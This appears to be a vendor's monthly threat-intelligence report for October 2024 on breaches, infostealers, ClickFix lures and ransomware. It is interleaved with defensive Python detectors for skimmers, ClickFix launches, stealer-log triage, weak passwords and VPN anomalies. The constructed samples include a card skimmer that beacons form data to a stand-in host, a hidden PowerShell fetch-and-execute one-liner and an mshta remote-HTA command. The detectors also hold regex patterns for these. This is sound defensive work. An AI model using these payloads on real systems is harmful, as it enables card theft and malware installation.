Reports · 12 min read · Nov 1, 2024

Monthly Threat Landscape Report: October 2024

Key trends in data breaches, malware campaigns, and threat actor activity from the past month.

Threat Intel Team

SocialEye

October 2024 Threat Intelligence Summary

This monthly report provides an overview of significant threat intelligence developments observed through the SocialEye platform during October 2024.

Key Statistics

Metric                              October 2024   September 2024   Change
New breach records indexed          847M           623M             +36%
Unique stealer log entries          12.4M          9.8M             +27%
New combo lists identified          156            134              +16%
Underground forum posts monitored   45K            41K              +10%

Major Breach Events

Healthcare Sector Under Siege

October saw a continuation of aggressive targeting against healthcare organizations:

Notable Incidents:

  • Regional hospital chain: 2.3M patient records
  • Health insurance provider: 890K member records
  • Medical laboratory network: 450K records including test results

Pattern Analysis:

  • Primary vector: Compromised VPN credentials
  • Ransomware groups claiming responsibility: BlackCat, LockBit
  • Average time to detection: 23 days

E-Commerce Breaches

Pre-holiday shopping season preparations were disrupted by multiple e-commerce compromises:

  • Three major retailers experienced Magecart-style attacks
  • Estimated 340K payment cards harvested
  • More client-side skimmers detected on checkout pages, where the card data is entered
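Detecting that kind of checkout-page skimmer, as an added example (not from the report and not SocialEye's platform code): the script below parses a constructed checkout page, allowlists the origins permitted to serve script, baselines known-good scripts by an SRI-style hash, and flags inline scripts that both read payment fields and send data off-page. The allowed origins, the baseline and the sample HTML are all assumptions a real shop would replace with its own.

```python
"""Heuristic scan of a checkout page for Magecart-style skimmers.

Added example for this report, not SocialEye code. The page HTML, the
allowlisted script origins and the baseline of known-good scripts are all
constructed; a real shop would replace them with its own.
"""
import base64
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Origins allowed to serve script on the checkout page (assumption).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}

# Traits a checkout skimmer needs: read the payment fields, ship them off-page,
# usually after some light encoding/obfuscation.
READS_CARD = re.compile(r"(?i)(card|cc[-_]?num|cvv|cvc|expir|document\.forms|querySelectorAll\(['\"]input)")
EXFIL = re.compile(r"(?i)(fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=\s*['\"]https?://|WebSocket\()")
OBFUSCATED = re.compile(r"(?i)(\b(atob|btoa)\(|fromCharCode|unescape\(|\\x[0-9a-f]{2})")


class ScriptCollector(HTMLParser):
    """Collect every <script> on the page as {"src": url-or-None, "body": text}."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def sri_hash(body):
    """Subresource-integrity style digest, used as the baseline key for inline scripts."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body.encode()).digest()).decode()


def scan_checkout(html, baseline):
    """Return (description, identifier) findings for scripts that are not in the baseline."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        if s["src"]:
            host = (urlparse(s["src"]).hostname or "").lower()
            if host not in ALLOWED_SCRIPT_HOSTS:
                findings.append(("external script from unapproved origin", s["src"]))
            elif s["src"] not in baseline:
                findings.append(("approved origin, but script URL not in baseline", s["src"]))
            continue
        digest = sri_hash(s["body"])
        if digest in baseline:
            continue
        traits = [name for name, rx in (("reads payment fields", READS_CARD),
                                        ("sends data off-page", EXFIL),
                                        ("encodes/obfuscates", OBFUSCATED))
                  if rx.search(s["body"])]
        if len(traits) >= 2:
            findings.append(("inline skimmer traits: " + ", ".join(traits), digest))
        else:
            findings.append(("inline script not in baseline", digest))
    return findings


# Constructed sample: the shop's own scripts, an unapproved third-party tag, and a skimmer.
LEGIT_INLINE = "window.dataLayer = window.dataLayer || []; dataLayer.push({event: 'checkout'});"
SKIMMER = ("document.getElementById('payment').addEventListener('submit', function () {"
           "var d = {}; document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });"
           "new Image().src = 'https://cdn-stats.example/p.gif?d=' + btoa(JSON.stringify(d)); });")
SAMPLE_HTML = f"""<html><body>
<form id="payment"><input name="cc_number"><input name="cvv"></form>
<script src="https://cdn.shop.example/checkout.js"></script>
<script>{LEGIT_INLINE}</script>
<script src="https://static.analytics-cdn.example/track.js"></script>
<script>{SKIMMER}</script>
</body></html>"""
BASELINE = {"https://cdn.shop.example/checkout.js", sri_hash(LEGIT_INLINE)}

if __name__ == "__main__":
    for desc, ident in scan_checkout(SAMPLE_HTML, BASELINE):
        print(f"{desc}: {ident}")
```

The same allowlist belongs in a Content-Security-Policy `script-src` directive and in `integrity` attributes on the tags; the heuristic pass is the detective control for the case the report describes, an inline injection on a page the shop itself serves, which CSP only blocks when nonces or hashes are enforced.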

Infostealer Trends

Lumma Stealer Dominance

Lumma has emerged as the leading infostealer family in October:

Distribution by Family:

  • Lumma: 34%
  • RedLine: 28%
  • Raccoon: 19%
  • Vidar: 12%
  • Other: 7%

Notable Lumma Capabilities

Recent Lumma variants add or improve:

  • Browser cookie extraction, including Chrome cookies protected by the app-bound encryption added in Chrome 127
  • Cryptocurrency wallet targeting (expanded to 40+ wallet types)
  • Session token harvesting for SaaS applications, which lets the buyer replay a logged-in session without passing MFA
  • Anti-analysis techniques to evade sandboxes

Distribution Campaigns

Observed vectors this month:

  1. Fake CAPTCHA pages ("ClickFix"): the page copies a command to the clipboard and tells the user to press Win+R, paste, and hit Enter, which runs a PowerShell or mshta one-liner that fetches the stealer
  2. Cracked software: Adobe, Microsoft Office, gaming tools
  3. YouTube tutorials: Links to "tools" in video descriptions
  4. Discord malware: Compromised game modifications
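The fake-CAPTCHA vector in item 1 leaves a distinctive trace in process-creation telemetry: the pasted command is launched from the Run dialog, so the interpreter's parent process is explorer.exe rather than a browser. The scorer below is an added example, not SocialEye code; it rates Sysmon-style events on that parent/child relationship plus command-line traits. The field names (Image, ParentImage, CommandLine), the sample events and the alert threshold are assumptions.

```python
"""Score process-creation events for the fake-CAPTCHA ("ClickFix") pattern.

Added example for this report, not SocialEye code. The event dicts are
constructed to look like Sysmon Event ID 1 fields (Image, ParentImage,
CommandLine); the field names and the scoring threshold are assumptions.
"""
import re

# Interpreters the lure's pasted command runs through the Win+R Run dialog,
# which is why the parent process is explorer.exe rather than a browser.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits of the pasted one-liner: hidden window, encoded body,
# remote fetch-and-execute, or mshta pulling an HTA straight from a URL.
TRAITS = [
    ("hidden window", re.compile(r"(?i)-(w|win|windowstyle)\s+hidden")),
    ("encoded command", re.compile(r"(?i)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    ("download-and-execute cmdlet",
     re.compile(r"(?i)\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|iex|invoke-expression)\b")),
    ("mshta from URL", re.compile(r"(?i)\bmshta(\.exe)?\s+\S*https?://")),
    ("URL in command line", re.compile(r"(?i)https?://\S+")),
]
ALERT_THRESHOLD = 3


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(evt):
    """Return (score, reasons) for one process-creation event."""
    if _basename(evt["Image"]) not in INTERPRETERS:
        return 0, []
    score, reasons = 0, []
    if _basename(evt["ParentImage"]) == "explorer.exe":
        # Run-dialog launches of an interpreter are rare on a user workstation.
        score += 2
        reasons.append("interpreter launched from explorer.exe (Run dialog)")
    for name, rx in TRAITS:
        if rx.search(evt.get("CommandLine", "")):
            score += 1
            reasons.append(name)
    return score, reasons


def alerts(events, threshold=ALERT_THRESHOLD):
    """Return the EventIds whose score reaches the threshold."""
    return [e["EventId"] for e in events if score_event(e)[0] >= threshold]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventId": "evt-1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'https://captcha-verify.example/check.txt' -UseBasicParsing)\""},
    {"EventId": "evt-2", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},  # user simply opened a console
    {"EventId": "evt-3", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},  # scheduled admin task
    {"EventId": "evt-4", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://verify-human.example/v.hta"},
    {"EventId": "evt-5", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["EventId"], score_event(e))
    print("alerts:", alerts(SAMPLE_EVENTS))
```

The clipboard write happens inside the browser and is invisible to this rule, so pair it with PowerShell Script Block Logging (Event ID 4104), which records the decoded body of the pasted command even when it arrives encoded.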

Credential Intelligence

Exposed Corporate Credentials

SocialEye tracked significant corporate exposure:

  • Fortune 500 companies: 12% showed new credential exposure
  • Technology sector most affected (34% of corporate exposures)
  • Average of 2,100 new corporate credentials surfacing daily
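Turning a stealer-log dump into a triage list for a monitored domain, as an added example (not SocialEye code and not any specific stealer family's real file format): the parser assumes the URL/USER/PASS layout common to stealer password files, keeps only entries tied to the monitored domain by host or e-mail domain, ranks remote-access hosts first, collapses duplicates seen across several logs, and never retains the plaintext beyond a masked hint and the SHA-1 prefix a k-anonymity range lookup needs. The log text, domain names and host keywords are constructed assumptions.

```python
"""Triage stealer-log credential dumps for a monitored corporate domain.

Added example for this report, not SocialEye code. The log text below is
constructed in the URL/USER/PASS layout common to stealer "passwords" files;
real families vary the labels, so the regex is an assumption. Passwords are
never stored in the output, only a masked hint and a SHA-1 prefix.
"""
import hashlib
import re
from urllib.parse import urlparse

MONITORED_DOMAINS = {"acme.example"}                     # assumption: the customer's domain
# Hosts whose credentials an Initial Access Broker would resell first.
HIGH_VALUE = ("vpn", "sso", "okta", "adfs", "remote", "citrix", "mail", "owa")

RECORD = re.compile(
    r"URL:\s*(?P<url>\S+)\s*\n\s*(?:USER|Username|Login):\s*(?P<user>\S+)\s*\n\s*(?:PASS|Password):\s*(?P<pw>[^\n]*)",
    re.IGNORECASE,
)


def mask(pw):
    """Keep two characters so an analyst can recognise a pattern without the secret."""
    return pw[:2] + "*" * max(len(pw) - 2, 0)


def is_corporate(url, user):
    host = (urlparse(url).hostname or "").lower()
    user_domain = user.rsplit("@", 1)[-1].lower() if "@" in user else ""
    host_match = any(host == d or host.endswith("." + d) for d in MONITORED_DOMAINS)
    return host_match or user_domain in MONITORED_DOMAINS


def triage(log_text):
    """Return deduplicated corporate credentials, high-value hosts first."""
    hits = {}
    for m in RECORD.finditer(log_text):
        url, user, pw = m["url"], m["user"], m["pw"].strip()
        if not pw or not is_corporate(url, user):
            continue
        host = (urlparse(url).hostname or "").lower()
        key = (user.lower(), host, pw)
        if key in hits:                       # same credential in several log files
            hits[key]["count"] += 1
            continue
        hits[key] = {
            "user": user.lower(),
            "host": host,
            "priority": "high" if any(t in host for t in HIGH_VALUE) else "normal",
            "pw_hint": mask(pw),
            # First 5 hex chars of SHA-1: enough for a k-anonymity range query,
            # not enough to recover the password from the output.
            "sha1_prefix": hashlib.sha1(pw.encode()).hexdigest()[:5].upper(),
            "count": 1,
        }
    return sorted(hits.values(), key=lambda r: (r["priority"] != "high", r["user"]))


# Constructed sample log (not real stealer output).
SAMPLE_LOG = """SOFT: Chrome
URL: https://vpn.acme.example/remote/login
USER: jdoe@acme.example
PASS: Fall2024!

URL: https://www.facebook.com/
USER: jdoe.personal@gmail.example
PASS: hunter2

URL: https://okta.acme.example/login/login.htm
USER: mpatel@acme.example
PASS: Welcome1

URL: https://vpn.acme.example/remote/login
USER: jdoe@acme.example
PASS: Fall2024!

URL: https://shop.example/account
USER: mpatel@acme.example
PASS: Summer2024
"""

if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(row)
```

The personal-site entry for the corporate user still surfaces (reused passwords are the point of combo lists), but sorts below the VPN and SSO hits, which are the ones that need a forced reset and session revocation the same day.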

Password Analysis

From October's breach data:

Most Common Passwords:

  1. password123 (still!)
  2. Company name + year
  3. Qwerty variations
  4. Welcome1
  5. Seasonal passwords (Fall2024)
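A banned-pattern check that rejects exactly these categories, added here as an example (not part of the report): it strips the trailing year, digits and punctuation users bolt on to satisfy complexity rules, undoes leet substitutions, and then compares the remaining base against company names, common base words, seasons and keyboard walks. The company names, base-word list and 12-character minimum are assumptions to be set from local policy; the same rules fit a custom banned-password list in an IdP or an AD password filter.

```python
"""Banned-pattern password check covering the categories in the list above.

Added example for this report, not SocialEye code. The company names, base
words and the 12-character minimum are assumptions a deployment would set
from its own policy.
"""
import re

COMPANY_NAMES = ("acme", "acmecorp")           # assumption: the organisation's own names
BASE_WORDS = ("password", "welcome", "letmein", "admin", "changeme", "secret")
SEASONS = ("spring", "summer", "fall", "autumn", "winter")
KEYBOARD_WALKS = ("qwerty", "qwertz", "azerty", "asdf", "zxcv", "1234", "1q2w3e")
MIN_LENGTH = 12                                # assumption
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t",
                      "@": "a", "$": "s", "!": "i"})
TRAILING_JUNK = re.compile(r"\d{0,4}[!@#$%^&*._\-]{0,3}$")


def banned_reason(pw, company_names=COMPANY_NAMES):
    """Return why pw is rejected, or None if it passes every rule."""
    lowered = pw.lower()
    # 1. Drop the year/digits/punctuation appended to satisfy complexity rules:
    #    "Fall2024", "Welcome1" and "Acme2024!" all collapse to their base word.
    raw_core = TRAILING_JUNK.sub("", lowered)
    # 2. Undo leet substitutions so "P@ssw0rd" compares as "password".
    core = raw_core.translate(LEET)
    for name in company_names:
        if name in core:
            return "company name"
    for word in BASE_WORDS:
        if word in core:
            return "common base word"
    if core in SEASONS:
        return "season + year"
    # Keyboard walks are checked before and after leet, since "1234" would
    # otherwise be rewritten by the digit substitutions.
    if any(raw_core.startswith(w) or core.startswith(w) for w in KEYBOARD_WALKS):
        return "keyboard walk"
    if len(pw) < MIN_LENGTH:
        return f"too short (minimum {MIN_LENGTH} characters)"
    return None


def audit(passwords):
    """Map each password to its rejection reason (None means accepted)."""
    return {pw: banned_reason(pw) for pw in passwords}


# Constructed samples: one per category in the report, plus controls.
SAMPLES = ["password123", "Acme2024!", "Qw3rty!", "Welcome1", "Fall2024",
           "P@ssw0rd", "1234567890", "Tr0ub4dor&3", "Correct-Horse-Battery-Staple"]

if __name__ == "__main__":
    for pw, reason in audit(SAMPLES).items():
        print(f"{pw:32} {reason or 'ok'}")
```

Run the same function over a credential-exposure feed as well as at password-set time: a "Fall2024" that passes a length rule today is the "Winter2025" an attacker will guess first when the user rotates.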

Positive Trends:

  • Slight increase in indicators of password manager adoption (long, random, unique passwords)
  • More unique passwords in newer breaches

Threat Actor Activity

Ransomware Groups

Most Active Groups (by victim count):

  1. LockBit 3.0 - 89 claimed victims
  2. BlackCat/ALPHV - 67 claimed victims
  3. Play - 45 claimed victims
  4. Akira - 38 claimed victims

Initial Access Broker Activity

Increased activity from Initial Access Brokers (IABs) selling:

  • VPN credentials: Average price $2,400
  • RDP access: Average price $1,800
  • Web shell access: Average price $650

Nation-State Activity

Observed campaigns attributed to:

  • APT groups: Targeting defense contractors, think tanks
  • Focus areas: Intellectual property, policy documents
  • TTPs: Supply chain compromise, watering hole attacks

Geographic Trends

Most Affected Regions (by breach volume)

  1. United States: 42%
  2. European Union: 23%
  3. United Kingdom: 8%
  4. India: 7%
  5. Brazil: 5%

Emerging Targets

Increased targeting observed in:

  • Southeast Asian financial services
  • Middle Eastern energy sector
  • Latin American government entities

Recommendations

Immediate Actions

  1. Review VPN security: Enforce MFA on all remote-access logins and monitor for exposed VPN credentials
  2. Employee awareness: Alert staff to ongoing phishing campaigns
  3. E-commerce monitoring: Extra vigilance during holiday preparation
  4. Healthcare sector: Prioritize network segmentation
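The compromised-VPN-credential pattern from the healthcare section and recommendation 1 above both come down to catching a valid login that the legitimate user did not make. Below is an added example (not SocialEye code) of three such rules run over constructed VPN login records: success without MFA, success after a run of failures, and impossible travel between two successes. The coordinates (rough city centres that a geo-IP database would supply), the thresholds and the field names are assumptions.

```python
"""Flag VPN logins that look like use of stolen credentials.

Added example for this report, not SocialEye code. The login records are
constructed; a real deployment would feed them from the VPN concentrator's
syslog or the SIEM and resolve ip -> lat/lon/country from a geo database.
Thresholds are assumptions.
"""
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

MAX_SPEED_KMH = 900         # faster than airline travel between two successes
SPRAY_FAILURES = 5          # consecutive failures before a success is suspicious


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two points."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi, dlmb = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlmb / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def analyze(events):
    """Return [{"user", "ts", "reasons"}] for successful logins that trip a rule.

    events: dicts with user, ts (ISO 8601), ip, lat, lon, country, mfa, result.
    """
    events = sorted(events, key=lambda e: e["ts"])
    last_ok, countries, failures = {}, {}, {}
    findings = []
    for e in events:
        u = e["user"]
        if e["result"] != "success":
            failures[u] = failures.get(u, 0) + 1
            continue
        ts = datetime.fromisoformat(e["ts"])
        reasons = []
        if not e["mfa"]:
            reasons.append("success without MFA")
        if failures.get(u, 0) >= SPRAY_FAILURES:
            reasons.append(f"success after {failures[u]} consecutive failures")
        prev = last_ok.get(u)
        if prev is not None:
            hours = (ts - prev["ts"]).total_seconds() / 3600
            km = haversine_km(prev["lat"], prev["lon"], e["lat"], e["lon"])
            if hours > 0 and km / hours > MAX_SPEED_KMH:
                reasons.append(f"impossible travel: {km:.0f} km in {hours:.1f} h "
                               f"({prev['country']} -> {e['country']})")
        if u in countries and e["country"] not in countries[u]:
            reasons.append(f"first login from {e['country']}")
        failures[u] = 0
        last_ok[u] = {"ts": ts, "lat": e["lat"], "lon": e["lon"], "country": e["country"]}
        countries.setdefault(u, set()).add(e["country"])
        if reasons:
            findings.append({"user": u, "ts": e["ts"], "reasons": reasons})
    return findings


# Constructed sample: carol commutes normally, alice's account is replayed from
# abroad without MFA 88 minutes after her real login, bob is password-sprayed.
SAMPLE_EVENTS = [
    {"user": "carol", "ts": "2024-10-14T08:00:00", "ip": "198.51.100.7", "lat": 40.71, "lon": -74.01,
     "country": "US", "mfa": True, "result": "success"},
    {"user": "alice", "ts": "2024-10-14T08:02:00", "ip": "203.0.113.10", "lat": 41.88, "lon": -87.63,
     "country": "US", "mfa": True, "result": "success"},
    {"user": "alice", "ts": "2024-10-14T09:30:00", "ip": "192.0.2.44", "lat": 52.37, "lon": 4.90,
     "country": "NL", "mfa": False, "result": "success"},
] + [
    {"user": "bob", "ts": f"2024-10-14T10:0{i}:00", "ip": "192.0.2.91", "lat": 48.86, "lon": 2.35,
     "country": "FR", "mfa": True, "result": "failure"}
    for i in range(5)
] + [
    {"user": "bob", "ts": "2024-10-14T10:06:00", "ip": "192.0.2.91", "lat": 48.86, "lon": 2.35,
     "country": "FR", "mfa": True, "result": "success"},
    {"user": "carol", "ts": "2024-10-14T18:00:00", "ip": "198.51.100.7", "lat": 40.71, "lon": -74.01,
     "country": "US", "mfa": True, "result": "success"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["user"], f["ts"], "; ".join(f["reasons"]))
```

Any of the three alerts fires within minutes of the login, which is the gap between this and the 23-day average detection time quoted above; the "first login from" rule is the noisiest and is best treated as context on the other two rather than an alert on its own.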

Strategic Priorities

  1. Implement continuous credential monitoring
  2. Enhance detection for stealer malware
  3. Review third-party access controls
  4. Tabletop exercises for ransomware scenarios

Looking Ahead: November Predictions

Based on current trends, we anticipate:

  • Increased holiday-themed phishing: Black Friday, Cyber Monday lures
  • Retail targeting: Point-of-sale and e-commerce focus
  • Tax preparation: Early tax-related phishing (some regions)
  • Year-end ransomware push: Groups seeking to meet quotas

About This Report

This report is compiled from SocialEye's threat intelligence platform, monitoring:

  • 400+ data sources
  • Real-time breach data ingestion
  • Underground forum analysis
  • Stealer log aggregation

Subscribe to receive monthly threat reports directly to your inbox. Sign up for alerts in your dashboard.

For detailed indicators of compromise (IOCs) from this month's threats, contact your SocialEye account representative or reach out to our team.
